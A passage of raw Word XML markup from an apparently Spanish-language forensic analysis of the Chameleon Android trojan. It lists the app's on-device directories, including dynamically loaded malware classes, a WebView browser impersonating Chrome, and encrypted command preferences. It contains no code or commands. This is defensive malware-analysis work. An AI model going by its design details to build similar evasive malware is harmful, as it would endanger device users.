          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>/live</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que hemos creado en el </w:t>
      </w:r>
      <w:r w:rsidR="005E4E6E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>host local</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Los datos extraídos tienen la siguiente estructura</w:t>
      </w:r>
      <w:r w:rsidR="00541030">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008576C8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">jerárquica </w:t>
      </w:r>
      <w:r w:rsidR="00541030">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>y características</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C627232" w14:textId="0D773CC3" w:rsidR="006E4EC0" w:rsidRPr="00541030" w:rsidRDefault="006E4EC0" w:rsidP="00541030">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00541030">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>app_ACRA-approved</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w:t>
      </w:r>
      <w:r w:rsidR="00541030">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en el que se incluyen</w:t>
      </w:r>
      <w:r w:rsidR="00541030" w:rsidRPr="00541030">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00541030">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>informes de crash reporting ACRA en el caso de producirse</w:t>
      </w:r>
      <w:r w:rsidR="00EB1060">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Los informes que se almacenan en esta carpeta son aquellos de tipo “approved”, es decir, por un lado, algunas tipologías de fallos que son automáticamente aceptadas para su envío al sistema, como pueden ser casos de fallos silenciosos o problemas con notificaciones de tipo Toast, y por otro lado, aquel tipo de fallos cuyo envío al sistema de crash reporting el usuario ha aceptado explícitamente. En este caso no se ha encontrado ninguna interacción con el usuario que permita establecer la granularidad de los fallos a enviar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9BCC4F" w14:textId="7029A356" w:rsidR="006E4EC0" w:rsidRPr="00541030" w:rsidRDefault="006E4EC0" w:rsidP="00541030">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00541030">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>app_ACRA-unapproved</w:t>
      </w:r>
      <w:r w:rsidR="00541030" w:rsidRPr="00541030">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00541030" w:rsidRPr="00541030">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00541030" w:rsidRPr="00541030">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00541030" w:rsidRPr="00541030">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Directorio vacío</w:t>
      </w:r>
      <w:r w:rsidR="00541030">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en el que se incluyen</w:t>
      </w:r>
      <w:r w:rsidR="00541030">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> informes de crash reporting ACRA en el caso de producirse</w:t>
      </w:r>
      <w:r w:rsidR="00541030">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00EB1060">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> El tipo de fallos de la aplicación que se almacenarían en este directorio serían “unapproved”, aquellos que no han sido admitidos para su envío al sistema de crash reporting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D67A4D9" w14:textId="615B4488" w:rsidR="006E4EC0" w:rsidRPr="00541030" w:rsidRDefault="006E4EC0" w:rsidP="00541030">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00541030">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>app_DynamicLib</w:t>
      </w:r>
      <w:r w:rsidR="00541030" w:rsidRPr="00541030">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00541030" w:rsidRPr="00541030">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00541030" w:rsidRPr="00541030">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Directorio vacío, posiblemente </w:t>
      </w:r>
      <w:r w:rsidR="00541030">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">su utilidad sea contener librerías dinámicas </w:t>
      </w:r>
      <w:r w:rsidR="00104886">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>si la aplicación hace uso de ellas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAE053F" w14:textId="70B87527" w:rsidR="006E4EC0" w:rsidRDefault="006E4EC0" w:rsidP="00541030">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>appDynamicOptDex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4F06EC" w14:textId="6ABD4140" w:rsidR="00541030" w:rsidRPr="00180C83" w:rsidRDefault="00541030" w:rsidP="00541030">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00180C83">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ks.json</w:t>
      </w:r>
      <w:r w:rsidR="00AD225D" w:rsidRPr="00180C83">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AD225D" w:rsidRPr="00AD225D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00AD225D" w:rsidRPr="00180C83">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Archivo JSON identificado en el análisis estático que contiene las clases de malware cargadas de manera dinámica con DexClassLoader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420D2BF2" w14:textId="2A740340" w:rsidR="00541030" w:rsidRDefault="00541030" w:rsidP="00541030">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>oat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4237EC" w14:textId="5CBC4363" w:rsidR="00541030" w:rsidRPr="00180C83" w:rsidRDefault="00AD225D" w:rsidP="00541030">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00180C83">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">ks.json.cur.prof </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD225D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00180C83">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00180C83" w:rsidRPr="00180C83">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Archivo de </w:t>
      </w:r>
      <w:r w:rsidR="00180C83">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">preferencias de perfil Baseline en Android, que sirve para optimizar la carga de código </w:t>
      </w:r>
      <w:r w:rsidR="001C3EC9">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">dinámico </w:t>
      </w:r>
      <w:r w:rsidR="00180C83">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>[X]</w:t>
      </w:r>
      <w:r w:rsidR="001C3EC9">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EB0C73" w14:textId="12681287" w:rsidR="006E4EC0" w:rsidRPr="00703DE8" w:rsidRDefault="006E4EC0" w:rsidP="00541030">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00703DE8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>app_textures</w:t>
      </w:r>
      <w:r w:rsidR="00703DE8" w:rsidRPr="00703DE8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00703DE8" w:rsidRPr="00703DE8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00703DE8" w:rsidRPr="00703DE8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Directorio vacío, posiblement</w:t>
      </w:r>
      <w:r w:rsidR="00703DE8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>e almacene texturas de la aplicación troyano en el caso de tratarse de una aplicación que requiera de ellas. En este caso al tratarse de una disposición WebView que hace uso de los elementos web del navegador, no requiere de texturas adicionales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F2C575" w14:textId="32C0861A" w:rsidR="006E4EC0" w:rsidRPr="00442A91" w:rsidRDefault="006E4EC0" w:rsidP="00541030">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442A91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>app_webview</w:t>
      </w:r>
      <w:r w:rsidR="004F196B" w:rsidRPr="00442A91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F196B" w:rsidRPr="004F196B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="004F196B" w:rsidRPr="00442A91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00442A91" w:rsidRPr="00442A91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Directorio principal de la </w:t>
      </w:r>
      <w:r w:rsidR="00442A91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>aplicación de navegador web</w:t>
      </w:r>
      <w:r w:rsidR="00442A91" w:rsidRPr="00442A91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00442A91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">proporcionada por el troyano que suplanta a Google Chrome. Incluye subdirectorios </w:t>
      </w:r>
      <w:r w:rsidR="002865C5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>de cookies, almacenamiento local y de sesión.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BBA3E4" w14:textId="76D1ACB2" w:rsidR="006E4EC0" w:rsidRPr="00DA5F14" w:rsidRDefault="006E4EC0" w:rsidP="00541030">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA5F14">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>cache</w:t>
      </w:r>
      <w:r w:rsidR="00DA5F14" w:rsidRPr="00DA5F14">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA5F14" w:rsidRPr="00DA5F14">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00DA5F14" w:rsidRPr="00DA5F14">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Directorio de cach</w:t>
      </w:r>
      <w:r w:rsidR="00DA5F14">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>é</w:t>
      </w:r>
      <w:r w:rsidR="00DA5F14" w:rsidRPr="00DA5F14">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> del nave</w:t>
      </w:r>
      <w:r w:rsidR="00DA5F14">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>gador proporcionado por Chameleon que suplanta a Google Chrome.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B44BBAA" w14:textId="3FE15DB1" w:rsidR="006E4EC0" w:rsidRPr="00FF5475" w:rsidRDefault="006E4EC0" w:rsidP="00541030">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF5475">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>code_cache</w:t>
      </w:r>
      <w:r w:rsidR="00FF5475" w:rsidRPr="00FF5475">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF5475" w:rsidRPr="00FF5475">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00FF5475" w:rsidRPr="00FF5475">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Directorio vacío en el que previsiblemente se almacena</w:t>
      </w:r>
      <w:r w:rsidR="00FF5475">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> caché.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A3C7A2" w14:textId="66F1D723" w:rsidR="006E4EC0" w:rsidRPr="00AE4D01" w:rsidRDefault="006E4EC0" w:rsidP="00541030">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE4D01">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>databases</w:t>
      </w:r>
      <w:r w:rsidR="00605C0C" w:rsidRPr="00AE4D01">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00605C0C" w:rsidRPr="00605C0C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00605C0C" w:rsidRPr="00AE4D01">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE4D01" w:rsidRPr="00AE4D01">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Directorio de bases de da</w:t>
      </w:r>
      <w:r w:rsidR="00AE4D01">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>tos generado por el malware. Contiene tanto un archivo</w:t>
      </w:r>
      <w:r w:rsidR="00244480">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de extensión</w:t>
      </w:r>
      <w:r w:rsidR="00AE4D01">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> db</w:t>
      </w:r>
      <w:r w:rsidR="00244480">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, que representa </w:t>
      </w:r>
      <w:r w:rsidR="00AE4D01">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">una base de datos SQLite como un archivo db-journal </w:t>
      </w:r>
      <w:r w:rsidR="00CB418E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>que se utiliza como archivo temporal para realizar operaciones atómicas en la base de datos y permitir el mecanismo de rollback [X].</w:t>
      </w:r>
      <w:r w:rsidR="00B26554">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Los contenidos de la base de datos creada serán analizados posteriormente en mayor detalle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEA8FD7" w14:textId="0419D8D1" w:rsidR="006E4EC0" w:rsidRPr="00CB5464" w:rsidRDefault="006E4EC0" w:rsidP="00541030">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB5464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>files</w:t>
      </w:r>
      <w:r w:rsidR="00CB5464" w:rsidRPr="00CB5464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB5464" w:rsidRPr="00CB5464">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00CB5464" w:rsidRPr="00CB5464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Directorio vacío del que se </w:t>
      </w:r>
      <w:r w:rsidR="00CB5464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>desconoce utilidad por parte del malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360DA466" w14:textId="72AAF773" w:rsidR="006E4EC0" w:rsidRDefault="006E4EC0" w:rsidP="00541030">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shared_prefs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F1AAAC" w14:textId="32CBD975" w:rsidR="00A675CA" w:rsidRPr="00A675CA" w:rsidRDefault="00A675CA" w:rsidP="00A675CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A675CA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>com.busy.lady_preferences</w:t>
      </w:r>
      <w:r w:rsidRPr="00A675CA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">.xml </w:t>
      </w:r>
      <w:r w:rsidRPr="00A675CA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00A675CA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Archivo de preferencias del malware analizado</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en la fase estática, que incluye valores encriptados de comandos y ajustes de Ch</w:t>
      </w:r>
      <w:r w:rsidR="00244480">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>meleon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649C17BD" w14:textId="65E45920" w:rsidR="00A675CA" w:rsidRDefault="00A675CA" w:rsidP="00A675CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A675CA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>WebViewChromiumPrefs</w:t>
      </w:r>
      <w:r w:rsidRPr="00A675CA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">.xml </w:t>
      </w:r>
      <w:r w:rsidRPr="00A675CA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00A675CA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Archivo de preferencias d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>e Chromium</w:t>
      </w:r>
      <w:r w:rsidR="00F26080">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que pertenece al navegador web que proporciona Chameleon</w:t>
      </w:r>
      <w:r w:rsidR="00E14AA9">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y que cuenta con una estructura estándar recogida en el código abierto del proyecto Chromium [X].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723E5BC2" w14:textId="77777777" w:rsidR="004B0474" w:rsidRDefault="00C2685B" w:rsidP="00E46B56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Como apunte adicional, el sistema Acra que posee la aplicación para la gestión de sus fallos </w:t>
      </w:r>
      <w:r w:rsidR="00EC748A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que ha sido comentado en la jerarquía y el análisis estático, junto con el</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> envío de informes al servicio de crash reporting no parece</w:t>
      </w:r>
      <w:r w:rsidR="00EC748A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> estar activo</w:t>
      </w:r>
      <w:r w:rsidR="00EC748A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en el dispositivo emulado. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C29F26" w14:textId="78EE8A58" w:rsidR="00E46B56" w:rsidRDefault="00C2685B" w:rsidP="00E46B56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Es posible que se trate de una característica del malware solamente utilizada </w:t>
      </w:r>
      <w:r w:rsidR="00054F14">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">para corregir fallos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">durante la fase de desarrollo </w:t>
      </w:r>
      <w:r w:rsidR="00054F14">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>de la aplicación</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, y que no se ha incluido en la versión inicial destinada a las víctimas para tratar de reducir la huella y minimizar las posibilidades </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>de detección del comportamiento malicioso del troyano.</w:t>
      </w:r>
      <w:r w:rsidR="00054F14">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> No obstante, no se han obtenido más detalles relativos a este mecanismo más allá de las menciones descritas previamente.</w:t>
      </w:r>
    </w:p>
